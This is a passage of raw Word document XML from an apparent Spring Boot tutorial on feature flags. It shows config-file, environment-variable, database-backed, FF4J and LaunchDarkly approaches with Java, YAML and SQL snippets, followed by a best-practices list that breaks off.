          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By leveraging these patterns, your microservices architecture becomes more resilient and better suited for handling complex, distributed transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2460755F" w14:textId="77777777" w:rsidR="00187C12" w:rsidRDefault="00000000" w:rsidP="00187C12">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E6BCA4">
          <v:rect id="_x0000_i2908" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C385C7A" w14:textId="777C6E65" w:rsidR="00013964" w:rsidRPr="00CE4B95" w:rsidRDefault="005452DC" w:rsidP="00442AC3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="704" w:name="_Toc197867918"/>
      <w:r w:rsidRPr="005452DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you implement feature flags or toggles in Spring Boot Microservices to control to roll out of new features</w:t>
      </w:r>
      <w:r w:rsidR="00013964" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="704"/>
    </w:p>
    <w:p w14:paraId="2C432D7F" w14:textId="62F4189A" w:rsidR="00400C9F" w:rsidRPr="00400C9F" w:rsidRDefault="00400C9F" w:rsidP="00183C18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Implementing Feature Flags in Spring Boot Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283524B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Feature flags (also known as feature toggles) allow you to enable or disable features at runtime without deploying a new version of your application. This is useful for </w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gradual rollouts</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A/B testing</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canary releases</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hotfixes</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CEA0E8"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28D4FD">
          <v:rect id="_x0000_i2909" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FF93A3"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Approaches to Implementing Feature Flags:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CFA64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onfig Files:</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Store feature flags in application.yml or application.properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2A2E3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nvironment Variables:</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Set feature flags at the environment level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3B873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Database-Driven:</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dynamically control features via a database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BFFCD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xternal Services:</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Unleash</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LaunchDarkly</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FF4J</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05546BA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ustom Implementation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create your own service to manage feature toggles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B19B9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FD8C2">
          <v:rect id="_x0000_i2910" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AAA7C1"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1. Using Configuration Files (Simple Approach)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F25DEC"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onfigure Feature Flags in application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1809F32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eatures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C2503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NewFeature: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498C7CD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BetaUI: false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9F022D"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Inject Configuration in Your Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482354A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import org.springframework.beans.factory.annotation.Value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E73A8D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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06212AF5" w14:textId="77777777" w:rsidR="00400C9F" w:rsidRPr="00400C9F" w:rsidRDefault="00400C9F" w:rsidP="00400C9F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4179AD3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Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F77B0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FlagService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7838EB5A" w14:textId="77777777" w:rsidR="00400C9F" w:rsidRPr="00400C9F" w:rsidRDefault="00400C9F" w:rsidP="00400C9F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AA9D41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Value("${features.enableNewFeature}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203AE5C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boolean enableNewFeature;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8CDDB4" w14:textId="77777777" w:rsidR="00400C9F" w:rsidRPr="00400C9F" w:rsidRDefault="00400C9F" w:rsidP="00400C9F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D220BE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String getFeatureStatus() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2F314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if (enableNewFeature) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63831A0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enabled";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378A948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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A71B16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disabled";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B072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4A13185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5999720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6EB79D9A"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Use the Feature Flag in Your Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152605D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web.bind.annotation.GetMapping;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBB14B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mport org.springframework.web.bind.annotation.RestController;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A15D9B7" w14:textId="77777777" w:rsidR="00400C9F" w:rsidRPr="00400C9F" w:rsidRDefault="00400C9F" w:rsidP="00400C9F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="534E0E6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RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748C80B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Controller {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D326510" w14:textId="77777777" w:rsidR="00400C9F" w:rsidRPr="00400C9F" w:rsidRDefault="00400C9F" w:rsidP="00400C9F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="215BF16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inal FeatureFlagService featureFlagService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F48C70C" w14:textId="77777777" w:rsidR="00400C9F" w:rsidRPr="00400C9F" w:rsidRDefault="00400C9F" w:rsidP="00400C9F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0608EDE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FeatureController(FeatureFlagService featureFlagService) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9B88E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this.featureFlagService = featureFlagService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDF61B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0B500AD" w14:textId="77777777" w:rsidR="00400C9F" w:rsidRPr="00400C9F" w:rsidRDefault="00400C9F" w:rsidP="00400C9F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AE7BA1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tMapping("/feature-status")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DB355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String featureStatus() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5299FF6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featureFlagService.getFeatureStatus();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E8FB0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CF3DE4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2A2A78D"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B6511">
          <v:rect id="_x0000_i2911" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4502A5B0"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2. Environment Variable-Based Flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119B262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onfigure in application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0812ADF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eatures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA968E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xperimentalMode: ${EXPERIMENTAL_MODE:false}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312A1CE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Access in Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A4234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Value("${features.experimentalMode}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEA7F0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ivate boolean experimentalMode;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75185C1A"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Run the Application with Environment Variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4292377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java -jar app.jar --EXPERIMENTAL_MODE=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E67EC42"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5107CE">
          <v:rect id="_x0000_i2912" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DF9A1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3. Dynamic Feature Flags with Database (Recommended for Production)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6428010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Create a Database Table for Feature Flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBB85A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CREATE TABLE feature_flags (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E039FB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id SERIAL PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C137BC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feature_name VARCHAR(100) UNIQUE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12819AD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enabled BOOLEAN DEFAULT FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111E715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7EEEFC5"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JPA Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0471384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Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0687C75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Flag {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F82C0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 xml:space="preserve">    @Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BCE7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neratedValue(strategy = GenerationType.IDENTITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1207EC6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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550461FD" w14:textId="77777777" w:rsidR="00400C9F" w:rsidRPr="00400C9F" w:rsidRDefault="00400C9F" w:rsidP="00400C9F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="243000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String featureName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608E17F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boolean enabled;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46393C1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1CC1FE8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Repository Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594ECDF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interface FeatureFlagRepository extends JpaRepository&lt;FeatureFlag, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F409B2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Optional&lt;FeatureFlag&gt; findByFeatureName(String featureName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8C1A6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15DCC977"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4: Service to Fetch Flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5229A5F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Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D1808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ToggleService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3C7590" w14:textId="77777777" w:rsidR="00400C9F" w:rsidRPr="00400C9F" w:rsidRDefault="00400C9F" w:rsidP="00400C9F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C76E9D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wired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F566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eatureFlagRepository repository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5957BF42" w14:textId="77777777" w:rsidR="00400C9F" w:rsidRPr="00400C9F" w:rsidRDefault="00400C9F" w:rsidP="00400C9F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="165120F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boolean isFeatureEnabled(String featureName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416A83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repository.findByFeatureName(featureName)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3D71C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map(FeatureFlag::isEnabled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0641C81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orElse(false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A5DF1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0A6B584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53278CF7"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5: Controller Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F57B76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RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53238B7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class FeatureToggleController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AA0BAE" w14:textId="77777777" w:rsidR="00400C9F" w:rsidRPr="00400C9F" w:rsidRDefault="00400C9F" w:rsidP="00400C9F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="378ED59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wired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA4273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rivate FeatureToggleService featureToggleService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8064E2" w14:textId="77777777" w:rsidR="00400C9F" w:rsidRPr="00400C9F" w:rsidRDefault="00400C9F" w:rsidP="00400C9F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61AB031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GetMapping("/is-feature-enabled/{name}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A2BD7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public boolean isFeatureEnabled(@PathVariable String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164C0B0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featureToggleService.isFeatureEnabled(name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4EC7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2F469FC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436C9233"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Dynamic Toggle Update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3731808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To change a flag's status without redeploying:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011B7D6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UPDATE feature_flags SET enabled = true WHERE feature_name = 'newFeature';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A69629"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A54061">
          <v:rect id="_x0000_i2913" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDB7026"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4. Using a Library: FF4J (Feature Flip for Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706A2B3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1: Add Dependency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3408070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t;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3301678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groupId&gt;org.ff4j&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EDD91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artifactId&gt;ff4j-spring-boot-starter&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAF58B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lt;version&gt;1.8&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EC731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t;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71086C82"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2: Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B379CA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ff4j:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8296F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core:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE5DD1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auto-create: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105F9C04"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3: Use FF4J in Your Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF1051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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5C3F2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ivate FF4j ff4j;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F0B807" w14:textId="77777777" w:rsidR="00400C9F" w:rsidRPr="00400C9F" w:rsidRDefault="00400C9F" w:rsidP="00400C9F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD0C91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ublic String checkFeature() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBF94C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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    if (ff4j.check("newFeature")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BB883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enabled!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A64508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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75717878"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return "New feature is disabled.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D278D81"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116C55B9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0421551B"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tep 4: Managing Flags via Web Console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCA97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Access the FF4J console at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3020B17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http://localhost:8080/ff4j-web-console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71447C1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A39B35">
          <v:rect id="_x0000_i2914" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B596D19"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5. External Feature Flag Service (e.g., LaunchDarkly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BB43E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ntegrate with services like LaunchDarkly to manage feature flags across environments dynamically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B28DD7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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C420CD"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LDClient client = new LDClient("YOUR_SDK_KEY");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342B2FC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boolean showFeature = client.boolVariation("your-feature-key", user, false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D43D21"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63584">
          <v:rect id="_x0000_i2915" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="243A0D68"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Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622110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Granular Control:</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use separate feature flags for different parts of the feature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297CD756"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onfiguration Management:</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Keep feature flag values externalized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355DD02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Avoid Flag Overload:</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remove unused or deprecated flags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B06BD02"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Testing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00400C9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
